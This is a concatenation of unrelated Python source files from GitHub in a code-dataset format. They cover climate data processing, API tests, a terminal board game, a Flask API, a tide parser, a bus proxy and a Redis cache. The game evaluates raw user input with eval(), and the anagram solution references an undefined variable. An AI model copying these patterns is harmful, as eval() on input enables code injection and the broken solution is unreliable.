import datetime,timedelta\n\ndef datetime_to_cftime(date,calendar='proleptic_gregorian'):\n '''Returns a cftime from a datetime\n\n Args:\n date (string): date in the form yyyymmddhh\n\n Returns:\n cftime: date in cftime \n '''\n\n y,m,d,h = (\n date.dt.year, date.dt.month, date.dt.day, date.dt.hour)\n \n return cftime.datetime(y,m,d,h,\n calendar=calendar)\n\ndef date_to_cftime(date,calendar='noleap'):\n '''Returns a cftime from a yyyymmddhh string\n\n Args:\n date (string): date in the form yyyymmddhh\n\n Returns:\n cftime: date in cftime \n '''\n\n # print(date,len(date))\n if len(date) >= 10:\n y,m,d,h = (\n int(date[0:4]),int(date[4:6]),\\\n int(date[6:8]),int(date[8:10])\n )\n return cftime.datetime(y,m,d,h,calendar=calendar)\n else:\n y,m,d = (\n int(date[0:4]),int(date[4:6]),\\\n int(date[6:8])\n )\n return cftime.datetime(y,m,d,0,calendar=calendar)\n\n \ndef search_esgf(conn,\n field,model,experiment,variant,\n date=None,table='6hrLev',verbose=False):\n\n '''Search dataset in the ESGF database for the field and \n desired year'''\n\n ctx = conn.new_context(\n project='CMIP6',\n source_id=model,\n experiment_id=experiment,\n variable=field,\n table_id=table,\n variant_label=variant,\n replica=False) # sometimes, \"latests=True\" works, other times \"replica=False\"\n # latest=True)\n\n if verbose:\n print('Hits: {}, Realms: {}, Ensembles: {}'.format(\n ctx.hit_count,\n ctx.facet_counts['realm'],\n ctx.facet_counts['ensemble']))\n \n if (ctx.hit_count > 0):\n \n result = ctx.search()[0]\n \n files = result.file_context().search()\n\n if (date is None):\n return files[0].opendap_url\n else:\n calendar = date.calendar\n # print(\"Calendar is\",calendar)\n for File in files:\n \n if (table in ['6hrLev','6hrPlevPt','3hr']):\n filename = File.opendap_url.split(\"/\")[-1]\n filedate = filename.split(\"_\")[-1].split(\"-\")[0][0:10]\n start_time = date_to_cftime(filedate,calendar=calendar)\n\n filedate = filename.split(\"_\")[-1].split(\"-\")[1][0:10]\n end_time = date_to_cftime(filedate,calendar=calendar)\n elif (table in ['day']):\n filename = File.opendap_url.split(\"/\")[-1]\n filedate = filename.split(\"_\")[-1].split(\"-\")[0][0:8]\n start_time = date_to_cftime(filedate,calendar=calendar)\n\n filedate = filename.split(\"_\")[-1].split(\"-\")[1][0:8]\n end_time = date_to_cftime(filedate,calendar=calendar)\n\n if (start_time <= date) and (date <= end_time):\n print(\"Date found:\",date, 'in',start_time,end_time) \n return File.opendap_url\n else:\n print(\"No matching files found\")\n\n return\n\ndef combine_hemispheres(var,time=None,lev=None,for_interp=False, \n minlat=20.,maxlat=75.,minlon=330.,maxlon=50.): \n '''Combine array (var) from both hemispheres with continuous\n coordinates.\n In some datasets the vertical coordinate is reversed.'''\n\n min_lat = minlat ; max_lat = maxlat\n min_lon = minlon ; max_lon = maxlon\n\n if (for_interp):\n min_lat = minlat - 5. ; max_lat = maxlat + 5.\n min_lon = minlon - 5. ; max_lon = maxlon + 5.\n\n if time is None and lev is None:\n west = var.sel(lat=slice(min_lat,max_lat),lon=slice(min_lon,360.))\n west['lon'] = west['lon'] - 360.\n east = var.sel(lat=slice(min_lat,max_lat),lon=slice(0.,max_lon))\n west_east = xr.concat([west,east],'lon')\n\n elif lev is None:\n west = var.sel(lat=slice(min_lat,max_lat),lon=slice(min_lon,360.),\n time=time)\n west['lon'] = west['lon'] - 360.\n east = var.sel(lat=slice(min_lat,max_lat),lon=slice(0.,max_lon),\n time=time)\n west_east = xr.concat([west,east],'lon')\n\n else:\n west = var.sel(lat=slice(min_lat,max_lat),lon=slice(min_lon,360.),\n lev=lev,time=time)\n west['lon'] = west['lon'] - 360.\n east = var.sel(lat=slice(min_lat,max_lat),lon=slice(0.,max_lon),\n lev=lev,time=time)\n west_east = xr.concat([west,east],'lon')\n\n return west_east\n\ndef virtual_temperature(t,q):\n '''\n Calculates virtual temperature (K) from temperature (K) and specific humidity (kg/kg)\n '''\n eps = 0.62198\n return t * ((q + eps) / (eps * (1. + q))) \n\ndef air_density(ps,t,q):\n '''\n Calculates air density (kg/m3) from \n pressure (hPa), temperature (K) and specific humidity (kg/kg)\n '''\n Rd = 287.058\n tv = virtual_temperature(t,q)\n return ps / (Rd * tv)\n\ndef make_data_set(du,ws,wd,rho):\n \"\"\"Creates xarray DataArray for netCDF write\n\n Args:\n du (dataset): sample dataset with attributes\n ws (DataArray): wind speed \n wd (DataArray): wind direction\n rho (DataArray): surface air density\n\n Returns:\n xarray DataArray: DataArray for write\n \"\"\"\n lat = xr.DataArray(\n data=ws.lat.values.astype('float32'),\n dims=[\"lat\"],\n coords=dict(\n lat=([\"lat\"], ws.lat.values)\n ),\n attrs=dict(\n long_name=\"latitude\",\n units=\"degrees_north\",\n axis=\"Y\"\n ),\n )\n lon = xr.DataArray(\n data=ws.lon.values.astype('float32'),\n dims=\"lon\",\n coords=dict(\n lon=([\"lon\"], ws.lon.values)\n ),\n attrs=dict(\n long_name=\"longitude\",\n units=\"degrees_east\",\n axis=\"X\"\n ),\n )\n level = xr.DataArray(\n data=ws.level.values.astype('float32'),\n dims=\"level\",\n coords=dict(\n level=([\"level\"], ws.level.values)\n ),\n attrs=dict(\n long_name=\"level\",\n units=\"m\",\n axis=\"Z\"\n ),\n )\n ds = xr.Dataset(\n data_vars=dict(\n wind_speed = (\n [\"time\",\"level\",\"lat\",\"lon\"],ws.values.astype('float32'),\n dict(long_name = \"wind speed\",\n units = \"m s-1\",\n vert_units = \"m\")),\n wind_direction = (\n [\"time\",\"level\",\"lat\",\"lon\"],wd.values.astype('float32'),\n dict(long_name = \"wind direction\",\n units = \"degrees\",\n vert_units = \"m\")),\n air_density = (\n [\"time\",\"lat\",\"lon\"],rho.values.astype('float32'),\n dict(long_name = \"surface air density\",\n units = \"kg m-3\",\n height = \"surface\")),\n ),\n coords=dict(\n lon=lon,\n lat=lat,\n level=level,\n time=ws.time\n ),\n attrs=dict(\n data_source = \"Processed data from CMIP6 runs\",\n experiment = du.experiment_id,\n source = du.source_id,\n variant_label = du.variant_label,\n data_written = datetime.now().strftime(\"%d/%m/%Y %H:%M\")\n )\n ) \n return ds\n","repo_name":"ahahmann/future-wind","sub_path":"future_wind.py","file_name":"future_wind.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"783796947","text":"from uuid import uuid1\n\nimport pytest\nfrom httpx import AsyncClient\n\nfrom lsst.cmservice.config import config\n\n\n@pytest.mark.asyncio()\nasync def test_productions_api(client: AsyncClient) -> None:\n \"\"\"Test `/productions` API endpoint.\"\"\"\n # Create a bunch of fresh productions\n pnames = []\n pids = []\n for n in range(15):\n pnames.append(str(uuid1()))\n response = await client.post(f\"{config.prefix}/productions\", json={\"name\": pnames[n]})\n assert response.status_code == 201\n data = response.json()\n assert data[\"name\"] == pnames[n]\n pids.append(data[\"id\"])\n\n # Create an additional production and delete it to get a \"dead\" id\n pname_dead = str(uuid1())\n response = await client.post(f\"{config.prefix}/productions\", json={\"name\": pname_dead})\n pid_dead = int(response.json()[\"id\"])\n response = await client.delete(f\"{config.prefix}/productions/{pid_dead}\")\n assert response.status_code == 204\n\n # Get list; verify first batch all there and dead one missing\n response = await client.get(f\"{config.prefix}/productions\")\n assert response.status_code == 200\n data = response.json()\n assert isinstance(data, list)\n pids_expected = set(pids)\n pids_retrieved = {production[\"id\"] for production in data}\n assert pids_expected <= pids_retrieved\n assert pid_dead not in pids_retrieved\n\n # Verify an individual get\n response = await client.get(f\"{config.prefix}/productions/{pids[0]}\")\n assert response.status_code == 200\n data = response.json()\n assert data[\"id\"] == pids[0]\n assert data[\"name\"] == pnames[0]\n\n # Try to get one that shouldn't be there\n response = await client.get(f\"{config.prefix}/productions/{pid_dead}\")\n assert response.status_code == 404\n\n # Verify repeated delete\n response = await client.delete(f\"{config.prefix}/productions/{pid_dead}\")\n assert response.status_code == 204\n\n # Try update with mismatched IDs\n response = await client.put(\n f\"{config.prefix}/productions/{pid_dead}\",\n json={\"id\": pids[0], \"name\": pname_dead},\n )\n assert response.status_code == 400\n\n # Try update of something not there\n response = await client.put(\n f\"{config.prefix}/productions/{pid_dead}\",\n json={\"id\": pid_dead, \"name\": pname_dead},\n )\n assert response.status_code == 404\n\n # Try to create a name conflict\n response = await client.post(f\"{config.prefix}/productions\", json={\"name\": pnames[0]})\n assert response.status_code == 422\n\n # Try to update to a name conflict\n response = await client.put(\n f\"{config.prefix}/productions/{pids[0]}\",\n json={\"id\": pids[0], \"name\": pnames[1]},\n )\n assert response.status_code == 422\n\n # Try a valid update and verify results\n pname_updated = str(uuid1())\n response = await client.put(\n f\"{config.prefix}/productions/{pids[0]}\",\n json={\"id\": pids[0], \"name\": pname_updated},\n )\n assert response.status_code == 200\n data = response.json()\n assert data[\"id\"] == pids[0]\n assert data[\"name\"] == pname_updated\n\n # Also check update results via individual get\n response = await client.get(f\"{config.prefix}/productions/{pids[0]}\")\n data = response.json()\n assert data[\"id\"] == pids[0]\n assert data[\"name\"] == pname_updated\n\n # Pagination check: loop retrieving pages and checking as we go\n skip = 0\n stride = 6\n pids_retrieved = set()\n results = await client.get(f\"{config.prefix}/productions?skip={skip}&limit={stride}\")\n assert results.status_code == 200\n data = results.json()\n while len(data) != 0:\n pids_batch = {production[\"id\"] for production in data}\n assert pids_batch.isdisjoint(pids_retrieved)\n pids_retrieved |= pids_batch\n skip += stride\n results = await client.get(f\"{config.prefix}/productions?skip={skip}&limit={stride}\")\n assert results.status_code == 200\n data = results.json()\n\n # Check we got everything expected, and none of the things we expected not\n # to get\n assert pids_expected <= pids_retrieved\n assert pid_dead not in pids_retrieved\n","repo_name":"lsst-dm/cm-service","sub_path":"tests/routers/test_productions.py","file_name":"test_productions.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24242482567","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom enum import Enum\nimport colored\nfrom colored import stylize\n\nimport threading\nimport time\nimport random\n\n##############################################################################\n# Game grid setup\nimax = 4\njmax = 4\ngrid = []\nfor i in range(0,imax):\n grid.append([])\n for j in range(0,jmax):\n grid[i].append(' ')\n\n# Coloring setup\ngridStyle = colored.attr(\"bold\") + colored.fg(\"white\")\npawnStyle = [[colored.bg(\"blue\") + colored.fg(\"white\")],\n [colored.bg(\"red\") + colored.fg(\"white\")]]\npathStyle = colored.bg(\"green\") + colored.fg(\"white\")\ndrawStyle = colored.attr(\"bold\") + colored.fg(\"white\")\n\n###############################################################################\ndef gridIsFull():\n global grid,imax,jmax\n for i in range(0,imax):\n for j in range(0,jmax):\n if grid[i][j]==' ':\n return False\n return True\n\n###############################################################################\ndef isInGrid(i, j):\n global grid, imax, jmax\n return 0 <= i < imax and 0 <= j < jmax\n\n###############################################################################\ndef drawLine(style):\n global grid, jmax, gridStyle\n\n print(stylize(f\"\\u2014\", style), end = '')\n for j in range(0, jmax):\n print(stylize(f\"\\u2014\\u2014\\u2014\\u2014\", style), end = '')\n print()\n\n\ndef printGrid(stolen = [], path = []):\n global grid, imax, jmax, gridStyle, pawns, pawnStyle\n\n print()\n drawLine(gridStyle)\n\n for i in range(0, imax):\n for j in range(0, jmax):\n # print(stylize(\"| \", gridStyle), end = '')\n print(stylize(\"|\", gridStyle), end = '')\n\n if [i,j] in path:\n print(stylize(f\" {grid[i][j]} \", pathStyle), end = '')\n else:\n if grid[i][j] == ' ':\n print(\" \", end = '')\n else:\n if [i,j] in stolen:\n print(stylize(stylize(f\" {grid[i][j]} \",\n pawnStyle[pawns.index(grid[i][j])]),\n colored.attr(\"blink\")), end = '')\n else:\n print(stylize(f\" {grid[i][j]} \", pawnStyle[pawns.index(grid[i][j])]),\n end = '')\n print(stylize(f\"|\", gridStyle))\n\n drawLine(gridStyle)\n\ndef printCell(i, j):\n return \"[\" + str(i) + \", \" + str(j) + \"]\"\n\n###############################################################################\ndef announceWinner(path):\n global grid, imax, jmax, gridStyle, pawns, pawnStyle\n\n pawn = grid[path[0][0]][path[0][1]]\n print()\n print(stylize(f\"{pawn} is the winner with a score of {len(path)}!\",\n pawnStyle[pawns.index(pawn)]), end = '')\n\n # print(stylize(f\"Winning path: {path}\",\n # xStyle if grid[path[0][0]][path[0][1]] == 'X' else oStyle))\n\n printGrid([], path)\n\ndef announceDraw(longestPath, allPaths):\n global grid, imax, jmax, drawStyle, pawns\n\n print()\n print(stylize(f\"The game ended in a draw with a score of {len(longestPath)}!\",\n drawStyle))\n\n allLPCells = []\n for i in range(0, len(pawns)):\n if len(longestPath) == len(allPaths[i]):\n allLPCells += allPaths[i]\n printGrid([], allLPCells)\n\n###############################################################################\ndef stealPawns(i, j, pName):\n global grid, imax, jmax, pawns, pawnStyle, stolen\n pawn = grid[i][j]\n stolen = []\n\n # Check the 4 pawns opposite to the one just added at (i,j),\n # and steal the pawns in between if the symbols match\n if i < imax - 2 and grid[i + 2][j] == pawn and grid[i + 1][j] != ' ' and grid[i + 1][j] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i + 1][j]} at [{i + 1},{j}] !\",pawnStyle[pawns.index(grid[i + 1][j])]))\n grid[i + 1][j] = pawn\n stolen.append([i + 1, j])\n\n if i > 1 and grid[i - 2][j] == pawn and grid[i - 1][j] != ' ' and grid[i - 1][j] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i - 1][j]} at [{i - 1},{j}] !\",\n pawnStyle[pawns.index(grid[i - 1][j])]))\n grid[i - 1][j] = pawn\n stolen.append([i - 1, j])\n\n if j < jmax - 2 and grid[i][j + 2] == pawn and grid[i][j + 1] != ' ' and grid[i][j + 1] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i][j + 1]} at [{i},{j + 1}] !\",\n pawnStyle[pawns.index(grid[i][j + 1])]))\n grid[i][j + 1] = pawn\n stolen.append([i, j + 1])\n\n\n if j > 1 and grid[i][j - 2] == pawn and grid[i][j - 1] != ' ' and grid[i][j - 1] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i][j - 1]} at [{i},{j - 1}] !\",\n pawnStyle[pawns.index(grid[i][j - 1])]))\n grid[i][j - 1] = pawn\n stolen.append([i, j - 1])\n\n return stolen\n###############################################################################\ndef randomGridInitialization():\n global grid, imax, jmax\n for i in range(0, imax):\n for j in range(0, jmax):\n if bool(random.getrandbits(1)) == True:\n grid[i][j] = 'O'\n else:\n grid[i][j] = 'X'\n\n###############################################################################\ndef boardArrayIndex(i, j):\n global grid, imax, jmax, nbPlayers, pawns\n startIdx = -1 # Index of board section dedicated to the symbol\n if grid[i][j] == ' ':\n startIdx = nbPlayers * imax * jmax\n else:\n startIdx = pawns.index(grid[i][j]) * imax * jmax\n return startIdx + jmax * i + j\n\ndef encodeBoard():\n global grid, imax, jmax, nbPlayers\n boardArray = [0] * (imax * jmax * (nbPlayers + 1))\n\n emptyIdx = nbPlayers * (imax * jmax)\n for i in range(0, imax):\n for j in range(0, jmax):\n boardArray[boardArrayIndex(i,j)] = 1\n\n print(boardArray)\n\n return boardArray\n\n\n###############################################################################\ndef left(i, j):\n return [i - 1, j]\n\ndef right(i, j):\n return [i + 1, j]\n\ndef top(i, j):\n return [i, j + 1]\n\ndef bottom(i, j):\n return [i, j - 1]\n\ndef resolveWinner():\n global grid,imax,jmax, pawns,pawnStyle\n # Resolve winner - DFS-style, considering all paths\n longestPath = []\n allPaths = [] # All longest paths, indexed by pawn\n for pn in pawns:\n allPaths.append([])\n\n for i in range(0, imax):\n for j in range(0, jmax):\n pawn = grid[i][j]\n\n # print(f\"Exploring grid from {printCell(i, j)}: {pawn}\")\n\n pathCandidate = explorePaths(i, j, pawn, [])\n # print(f\"pathCandidate: {pathCandidate} - l: {len(pathCandidate)}\")\n\n if len(pathCandidate) > len(longestPath):\n longestPath = pathCandidate\n\n if len(pathCandidate) > len(allPaths[pawns.index(pawn)]):\n allPaths[pawns.index(pawn)] = pathCandidate\n\n # print(f\"longestPath: {longestPath} - l: {len(longestPath)}\")\n # print(f\"{grid[longestPath[0][0]][longestPath[0][1]]} is the winner\")\n\n lpCount = 0\n for i in range(0, len(pawns)):\n if len(allPaths[i]) == len(longestPath):\n lpCount += 1\n\n return (lpCount != 1), longestPath, allPaths\n\ndef explorePaths(i, j, pawn, path): # returns longestPath\n path += [[i,j]]\n paths = []\n longestPath = path\n\n # print(path)\n # tmp = input(\"continue?\")\n\n for p in [left(i,j), right(i,j), top(i,j), bottom(i,j)]:\n if isInGrid(p[0], p[1]) \\\n and grid[p[0]][p[1]] == pawn \\\n and not p in path:\n # print (f\"Moving to [{p[0]},{p[1]}]\")\n pathCandidate = explorePaths(p[0], p[1], pawn, path[:])\n if len(pathCandidate) > len(longestPath):\n longestPath = pathCandidate\n\n return longestPath\n\n\n###############################################################################\nclass Player(threading.Thread):\n\n def __init__(self, name, num, pawn, playerType):\n threading.Thread.__init__(self)\n self.setName(name) # Player name (e.g., 'Player 1')\n self.num = num # player id (e.g., 1 for Player 1)\n self.pawn = pawn # Type of pawn assigned to the player\n self.playerType = playerType # player type: 0 = computer, 1 = human\n self.stop = False # Flag used to stop the thread when requested by the main loop\n\n def run(self):\n # Grant access to global variables\n global mutex # lock on concurrent access to global variables\n global readyToPlay # Flag granted authorization to play to the players\n global moveCounter # move counter\n global first # id of the player playing first\n global nbjoueurs # total number of playes\n # global aide # dit si l'affichage d'une aide est demandé\n\n while not self.stop: # While thread has not been stopped by game loop\n\n ##### => each player awaits to its turn\n while True: # Player wait loop\n # acquire lock on global variables\n mutex.acquire()\n if self.stop:\n # Game over, leave player wait loop but keeping the acquired lock\n break\n if readyToPlay and (moveCounter+first)%nbPlayers == self.num:\n # = it is this player's turn to play, keep lock and leave loop\n break\n # otherwise, release lock and let other players check for their turn\n mutex.release()\n\n ##### => Current player's turn\n\n if not self.stop:\n if self.pawn == 'X':\n otherPawn = 'O'\n else:\n otherPawn = 'X'\n print\n print(self.getName() + \" plays ('\" + self.pawn + \"' against '\" + otherPawn + \"')\")\n\n if self.playerType == PlayerType.COMPUTER:\n # Player is a computer\n\n # self.chx = ajouer(self.pion)\n # print self.getName() + \" joue case: \",self.chx\n # grille[self.chx[0]][self.chx[1]]=self.pion\n time.sleep(0.1)\n else:\n # Player is a human\n # self.chx = ajouer(self.pion)\n ch=self.getName() + \" plays cell (e.g., '[1,2]'): \"\n while True:\n self.move = input(ch)\n try:\n # player has entered a line, column couple\n x = eval(self.move)\n if ((type(x) == list or type(x) == tuple) and len(x) == 2) \\\n and (0 < x[0] <= imax) and (0 < x[1] <= jmax) \\\n and grid[x[0] - 1][x[1] - 1] == ' ':\n grid[x[0] - 1][x[1] - 1] = self.pawn\n # Perform stealing checks and update grid\n stolen = stealPawns(x[0] - 1, x[1] - 1, self.getName())\n break\n else:\n raise Exception()\n except:\n # ici, le choix entré n'est pas correct\n print(\"--> incorrect move. FORMAT: 'line, col' or '[line, col]' (i,j) \\in [1..4]\")\n pass\n\n ##### => end of player turn\n\n # execution is yielded back to game loop\n readyToPlay = False\n\n # Release mutex on global variables\n mutex.release()\n\n # If termination has been requested, terminate\n if self.stop:\n break\n\n def terminate(self):\n self.stop = True\n\n###############################################################################\nnbPlayers = 2\ntestMode = False\npawns = ['O','X']\n\nclass PlayerType(Enum):\n COMPUTER = 0,\n HUMAN = 1\n\n# Player types: 0=ordinateur, 1=humain; there must be: len(playerTypes) == nbPlayers\nwhile True:\n print\n print (u\"Game type:\")\n print (u\"[1]: 2 humans play together\")\n print (u\"[2]: 1 computer plays against 1 human player\")\n print (u\"[3]: the computer plays against itself\")\n print (u\"[4]: generates a random grid\")\n x = input(\"What type of game do you wish to play? [1 by default]: \")\n if x == '1' or x == '':\n playerTypes = [1,1]\n break\n\n if x == '2':\n playerTypes = [0,1]\n print('Games with computer are not supported yet.')\n exit()\n\n if x == '3':\n playerTypes = [0,0]\n print('Games with computer are not supported yet.')\n exit()\n\n if x == '4':\n testMode = True\n break\n\nif testMode:\n randomGridInitialization()\n printGrid()\n draw, longestPath, allPaths = resolveWinner()\n if draw:\n announceDraw(longestPath, allPaths)\n else:\n announceWinner(longestPath)\n\n encodeBoard()\n\n exit()\n\n\n# Assign a pawn type to each player\nprint\nprint (u\"=====> player 1 has the 'O' pawn, the other the 'X' pawn\")\n\n\n# define the player who will play the first move, or choose randomly\nwhile True:\n print\n print (u\"Who should play the first move?\")\n print (u\"[1] player 1 starts\")\n print (u\"[2] player 2 starts\")\n print (u\"[3] choose randomly\")\n x = input(u\"Choose an option [3 by default]: \")\n if x == '1':\n first = 0\n break\n elif x == '2':\n first = 1\n break\n elif x == '3' or x == '':\n first = random.randint(0, nbPlayers - 1)\n break\n\nprint\nprint (\"=====> Player \" + str(first+1) + \" plays first\")\n\n############################## => program initialization\n\n# mutex on global variables below\nmutex = threading.Lock()\n\n# Counts the number of moves played by all players,\nmoveCounter = -1\n\n# Flag used to yield back the execution to the main program after a move is played\nreadyToPlay = False\n\n# List of stolen cells at the current turn\nstolen = []\n\n# Creation of the list of players\nplayers = []\nfor i in range(0,nbPlayers):\n p = Player(\"Player %d\" % (i+1), i, pawns[i], playerTypes[i])\n p.setDaemon(True)\n players.append(p)\n\n# lancement de tous les threads des joueurs\nfor i in range(0, nbPlayers):\n players[i].start()\n\n# ##############################\n# # Game loop\n\nt = time.time()\nwhile True:\n # waiting for a player to play its turn\n while True:\n mutex.acquire()\n if not readyToPlay:\n moveCounter +=1 # increment move counter for the move has just been played\n break\n mutex.release()\n\n # print the updated game grid\n printGrid(stolen)\n\n # end of game condition\n if gridIsFull():\n draw, longestPath, allPaths = resolveWinner()\n if draw:\n announceDraw(longestPath, allPaths)\n else:\n announceWinner(longestPath)\n mutex.release()\n break\n\n # New round detection\n roundNum = round((moveCounter / nbPlayers) + 1)\n nextPlayer = moveCounter % nbPlayers\n # if nextPlayer == 0:\n # print\n # print (u\"=====> Starting round #\" + str(roundNum))\n\n # Allow the next player to play its turn\n readyToPlay = True\n mutex.release()\n # loop until the next player has made his move\n\n#############################\n# Game end\n# print\n# print (\"Game over!\")\n\n# stop all threads\nfor i in range(0, nbPlayers):\n players[i].terminate()\n\n# Wait until all threads are terminated\nfor i in range(0, nbPlayers):\n players[i].join()\n mutex.acquire()\n #print (\"end of thread \" + players[i].getName())\n mutex.release()\n\n\nprint\n#print (u\"Come back soon for another game of Ginerion!\")\n","repo_name":"pthalamy/Ginerion","sub_path":"ginerion.py","file_name":"ginerion.py","file_ext":"py","file_size_in_byte":15801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40540555035","text":"# wsgi.py\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nimport json\napp = Flask(__name__)\n\nthe_products = [\n { 'id': 1, 'name': 'Skello' },\n { 'id': 2, 'name': 'Socialive.tv' },\n { 'id': 3, 'name': 'Scality' },\n { 'id': 4, 'name': 'Actifio' },\n { 'id': 5, 'name': 'Google' },\n ]\n\n@app.route('/')\ndef hello():\n return \"Hello World!\"\n\n@app.route('/api/v1/products')\ndef products():\n return jsonify(the_products)\n\n@app.route('/api/v1/products/', methods=['GET'])\ndef get_product(id):\n for product in the_products:\n if product['id'] == int(id):\n return jsonify(product)\n return jsonify({'error' : 'Product not found'}), 404\n\n@app.route('/api/v1/products/', methods=['DELETE'])\ndef del_product(id):\n for product in the_products:\n if product['id'] == id:\n del the_products[the_products.index(product)]\n return '', 204\n return jsonify({'error' : 'Product not found'}), 404\n\n@app.route('/api/v1/products', methods=['POST'])\ndef add_product():\n try:\n payload = json.loads(request.data)\n except ValueError :\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n if 'name' not in payload:\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n max_id = 0\n for product in the_products:\n if max_id < product['id']:\n max_id = product['id']\n if product['name'] == payload['name']:\n return jsonify({\"error\" : \"Product already exists\"}), 422\n the_products.append({ 'id': max_id+1, 'name': payload['name'] })\n return jsonify({ 'id': max_id+1, 'name': payload['name'] }), 201\n\n@app.route('/api/v1/products/', methods=['PATCH'])\ndef change_product(id):\n try:\n payload = json.loads(request.data)\n except ValueError :\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n if 'name' not in payload:\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n for product in the_products:\n if product['id'] == id:\n product['name'] = payload['name']\n return '', 204\n return jsonify({'error' : 'Product not found'}), 404\n","repo_name":"Coballt/flask-101","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38709187058","text":"from kartverket_tide_api.parsers import AbstractResponseParser\nfrom kartverket_tide_api.exceptions import CannotFindElementException, NoTideDataErrorException\nfrom kartverket_tide_api.tideobjects import WaterLevel\n\n\nclass LocationDataParser(AbstractResponseParser):\n def _parsing_logic(self) -> {}:\n \"\"\"Parse the response of a station list request. Returns a dictionary containing a list of stations\n\n :exception CannotFindElementException: cannot find some expected element in the xml\n :exception NoTideDataErrorException: the xml has no tide data\n\n :return dict containing a list of WaterLevel objects\n \"\"\"\n location_data = self.root.find('locationdata')\n if location_data is None:\n raise CannotFindElementException('Cannot find location_data element')\n nodata = location_data.find('nodata')\n\n if nodata is not None:\n raise NoTideDataErrorException('This location has no tide data')\n data = location_data.find('data')\n\n if data is None:\n raise CannotFindElementException('Cannot find data element')\n\n data_type = data.attrib['type']\n water_levels = []\n for water_level in data.iter('waterlevel'):\n attribs = water_level.attrib\n if attribs['flag'] == 'high' or attribs['flag'] == 'low':\n water_levels.append(WaterLevel(attribs['value'],\n attribs['time'],\n data_type,\n attribs['flag'] == 'high'))\n else:\n water_levels.append(WaterLevel(attribs['value'],\n attribs['time'],\n data_type))\n\n return {'data': water_levels}\n","repo_name":"matsjp/kartverket_tide_api","sub_path":"kartverket_tide_api/parsers/locationdataparser.py","file_name":"locationdataparser.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18170289082","text":"class Solution:\n def valid_anagram(self, s1, s2):\n # hash table\n d1 = dict()\n d2 = dict()\n if len(s1) != len(s2):\n return False\n for i in range(len(s1)):\n if s1[i] in d1:\n d1[s[i]] += 1\n else:\n d1[s[i]] = 1\n if s2[i] in d2:\n d2[s[i]] += 1\n else:\n d2[s[i]] = 1\n return d1 == d2\n \n \n # Sorted\n s1_list = sorted(s1)\n s2_list = sorted(s2)\n return \"\".join(s1_list) == \"\".join(s2_list)\n","repo_name":"AnnaDai1001/Python_practice_log","sub_path":"Leetcode/ByTitle/242_valid_anagram.py","file_name":"242_valid_anagram.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41288711350","text":"import flask\r\nfrom requests import get\r\n\r\nMAGICBUS_API_KEY = \"\" # Insert API key here\r\n\r\napp = flask.Flask('__main__')\r\nSITE_NAME = 'https://mbus.ltp.umich.edu/bustime/api/v3/getpredictions?key=' + MAGICBUS_API_KEY + '&format=json&top=3&stpid='\r\n\r\n@app.route('/', defaults={'path': ''})\r\n@app.route('/')\r\ndef proxy(path):\r\n resp = flask.Response(get(f'{SITE_NAME}{path}').content)\r\n resp.headers['Access-Control-Allow-Origin'] = '*'\r\n return resp\r\n\r\napp.run(host='localhost', port=8000)\r\n","repo_name":"montanamott/warmer-winter-walks","sub_path":"warmer-winter-walks/src/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8760792885","text":"from functools import wraps\n\nimport jsonpickle\n\nfrom backend.factory import redis_client\n\n\ndef redis_cached(expired_seconds: int = 180):\n \"\"\"\n redis缓存装饰器\n :param expired_seconds:\n :return:\n \"\"\"\n\n def __actual_redis_cached(func):\n def __generate_list_args_token(__args_list) -> str:\n result_list = []\n for __args in __args_list:\n result_list.append(str(__args))\n return \",\".join(result_list)\n\n def __generate_dict_args_list(__args_dict) -> str:\n result_list = []\n for key, value in __args_dict.items():\n result_list.append(\"{0}={1}\".format(key, value))\n return \",\".join(result_list)\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n cache_key = \"cached:{0}:{1},{2}\".format(\n func.__name__,\n __generate_list_args_token(args),\n __generate_dict_args_list(kwargs),\n )\n redis_helper_instance = redis_client\n redis_result = redis_helper_instance.get(key=cache_key)\n\n if redis_result is None:\n value = func(*args, **kwargs)\n value_json = jsonpickle.encode(value)\n redis_helper_instance.set(\n key=cache_key, value=value_json, expired_seconds=expired_seconds\n )\n else:\n value = jsonpickle.decode(redis_result)\n return value\n\n return wrapper\n\n return __actual_redis_cached\n","repo_name":"Philogag/The-Project-Demo","sub_path":"backend/utility/redis_cache_helper.py","file_name":"redis_cache_helper.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19221732072","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(0, 5*np.pi, 1000)\n\ny1 = np.sin(x)\ny2 = np.sin(2*x)\n\n# plt.fill 填充區域繪圖區的顏色\nplt.fill(x, y1, c=\"g\")\nplt.fill(x, y2, c=\"r\")\n# plt.fill_between 兩個繪圖區之間的填塞\nplt.fill_between(x, y1, y2, 